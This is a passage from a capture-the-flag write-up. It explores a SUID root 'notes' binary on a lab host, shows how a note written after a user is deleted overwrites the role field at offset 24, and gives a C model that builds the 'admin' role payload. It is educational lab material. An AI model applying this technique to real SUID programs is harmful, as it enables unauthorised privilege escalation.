notes
There are a few things that I am able to access now that I have moved laterally to the tbuckley user. One of them is group membership: the tbuckley user is part of the dev group.
tbuckley@gofer:~$ find / -group dev -ls -type f 2>/dev/null
136487 20 -rwsr-s--- 1 root dev 17168 apr 28 16:06 /usr/local/bin/notes
Members of the dev group are able to execute this binary, /usr/local/bin/notes, which is both SUID (owner root) and SGID (group dev). Note that -ls comes before -type f in the find command above, so directories owned by the group would have been listed too; here there was only the one file. All of this was enumerated earlier, but I could not go further at the time: the rwsr-s--- mode grants nothing to other users, so the binary was neither readable nor executable from the account I had then.
tbuckley@gofer:~$ file /usr/local/bin/notes
/usr/local/bin/notes: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6a9c0faa06eabfa48a864bb7341f29deecd7e9e3, for GNU/Linux 3.2.0, not stripped
It's a 64-bit, dynamically linked PIE with the setuid and setgid bits set, and it is not stripped, so symbol names are available for analysis.
tbuckley@gofer:~$ /usr/local/bin/notes
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================
your choice:
Running the binary presents a menu of nine options.
[...REDACTED...]
your choice: 2
First create an user!
[...REDACTED...]
your choice: 3
[...REDACTED...]
your choice: 5
note: (null)
[...REDACTED...]
your choice: 6
Coming soon!
[...REDACTED...]
your choice: 7
There appears to be no user and no note yet. While it looks like I can create both, option 8, backing up notes, seems the most interesting, so I try it first.
your choice: 8
First create an user!
However, it requires a user to exist first.
your choice: 1
choose an username: qwe
[...REDACTED...]
your choice: 2
username: qwe
role: user
So I created a user, qwe, which was given the role user.
your choice: 8
access denied: you don't have the admin role!
It seems that only a user with the admin role can perform the backup operation.
your choice: 4
write your note:
This is a note statement
Next I test the note feature.
your choice: 5
note: statement
Interestingly, option 5 prints only statement instead of the full This is a note statement, which already suggests that the note is read back from a different offset than the one it was written to.
Overflow
After playing around with these options for a while, I found an interesting pattern: data written through one option overwrites data belonging to another.
Your choice: 1
Choose an username: qwe
Your choice: 2
Username: qwe
Role: user
First I create a new user and check it.
Your choice: 3
Your choice: 2
Username:
Role: user
Option 3 deletes the user, and option 2 then shows the change: only the username is gone, while the role still reads user. The user record is evidently still being read after the delete.
tbuckley@gofer:/opt$ python3 -c 'print("A"*16+"B"*16+"C"*16+"D"*16)'
AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD
Next I generate a 64-byte string made of four 16-byte runs (A, B, C, D) so that I can tell, from whatever is printed back, which part of the input landed where.
Your choice: 4
Write your note:
AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD
Then I write that string as a note with option 4.
Your choice: 5
Note: CCCCCCCCCDDDDDDDDDDDDDDDD
Only the tail of the note is printed, but something more important has happened to the username and role.
Your choice: 2
Username: AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCC
Role: BBBBBBBBCCCCCCC
The note has overwritten both user attributes, username and role. Counting the output: the username now holds bytes 0 through 38 of the note (16 A's, 16 B's, 7 C's), the role holds bytes 24 through 38 (8 B's, 7 C's), and option 5 shows bytes 39 onward. I was able to reproduce this consistently, which means I control what goes into those fields; in particular, whatever is written 24 bytes into a note ends up as the role. Once I can set the role to admin, I should be able to reach the backup operation, option 8.
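The overlap measured above can be reproduced with a small model. The following C program is an added example, not code from the original post and not the notes binary itself. It assumes a 40-byte user record made of a 24-byte username followed by a 16-byte role, and it assumes the note is copied into the same memory the record lives in, starting at the username (that is what the username picking up byte 0 of the payload suggests; the page does not show why the two overlap, so the aliasing is an assumption, not an established property of the binary). pattern_offset() is the byte counting done above, applied to the strings the binary printed; role_after_write() shows the unchecked copy landing in the role field next to a bounded copy that cannot reach it; build_payload() crafts the padding-plus-role string that the measured offset implies. The role name admin comes from the binary's own "access denied" message; the user name qwe and the marker string are the ones used above.

```c
#include <stdio.h>
#include <string.h>

/* Layout assumed for the model: 24 bytes of username, then 16 bytes of role.
 * The real layout of /usr/local/bin/notes is not shown on the page. */
struct user_rec {
    char username[24];
    char role[16];
};

/* The 64-byte marker string that was written as a note above. */
static const char kPattern[] =
    "AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD";

/* Offset in the marker string at which an observed output string begins,
 * or -1 if it does not occur there.  This is the byte counting done above:
 * the role printed as "BBBBBBBBCCCCCCC" begins 24 bytes into the pattern. */
int pattern_offset(const char *pattern, const char *observed) {
    const char *hit = strstr(pattern, observed);
    return hit ? (int)(hit - pattern) : -1;
}

/* Vulnerable model of option 4: the note is copied with the input's own
 * length into memory that starts at the user record (assumed aliasing), so
 * bytes 24 and up land in role.  A real unchecked copy would not stop at the
 * end of the record; the cap only keeps the model inside its own object. */
static void write_note_unchecked(struct user_rec *u, const char *note) {
    char *dst = (char *)u;
    size_t n = strlen(note);
    if (n > sizeof *u - 1) n = sizeof *u - 1;
    memcpy(dst, note, n);
    dst[n] = '\0';
}

/* Hardened counterpart: the copy is bounded by the destination field, so
 * role can never be reached no matter how long the note is. */
static void write_note_checked(struct user_rec *u, const char *note) {
    snprintf(u->username, sizeof u->username, "%s", note);
}

/* Create the user "qwe" with role "user" (what option 1 did above), write
 * the note, and return the role field as a string.  Static storage keeps the
 * demo simple; it is not reentrant. */
const char *role_after_write(const char *note, int hardened) {
    static struct user_rec rec;
    static char out[sizeof rec.role + 1];
    memset(&rec, 0, sizeof rec);
    strcpy(rec.username, "qwe");
    strcpy(rec.role, "user");
    if (hardened)
        write_note_checked(&rec, note);
    else
        write_note_unchecked(&rec, note);
    memcpy(out, rec.role, sizeof rec.role);
    out[sizeof rec.role] = '\0';
    return out;
}

/* Build role_off bytes of padding followed by the wanted role: the payload
 * shape the measured offset implies.  Returns the payload (static storage),
 * or NULL if it would not fit. */
const char *build_payload(size_t role_off, const char *role) {
    static char buf[128];
    if (role_off + strlen(role) >= sizeof buf) return NULL;
    memset(buf, 'A', role_off);
    strcpy(buf + role_off, role);
    return buf;
}

int main(void) {
    printf("username starts at %d\n",
           pattern_offset(kPattern, "AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCC"));
    printf("role starts at     %d\n", pattern_offset(kPattern, "BBBBBBBBCCCCCCC"));
    printf("note read from     %d\n",
           pattern_offset(kPattern, "CCCCCCCCCDDDDDDDDDDDDDDDD"));
    const char *p = build_payload(24, "admin");
    printf("unchecked copy -> role \"%s\"\n", role_after_write(p, 0));
    printf("bounded copy   -> role \"%s\"\n", role_after_write(p, 1));
    return 0;
}
```

With the marker string as the note, the unchecked copy leaves the role reading BBBBBBBBCCCCCCC, the same 15 characters the binary printed; with 24 bytes of padding followed by admin it leaves the role reading admin, while the bounded copy leaves it at user in both cases. The cap inside write_note_unchecked exists only so the model never writes outside its own object; it is not something the real binary is claimed to do.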
Moving on to the privilege escalation phase.